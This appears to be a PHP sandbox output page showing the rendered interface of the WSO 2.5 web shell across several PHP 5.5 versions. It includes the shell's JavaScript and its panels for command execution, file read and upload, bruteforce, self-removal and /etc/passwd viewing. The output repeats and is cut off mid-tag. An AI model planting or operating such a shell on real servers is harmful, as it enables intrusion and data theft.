2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.38
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.38 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.37
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.37 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.36
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.36 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.35
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.35 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input 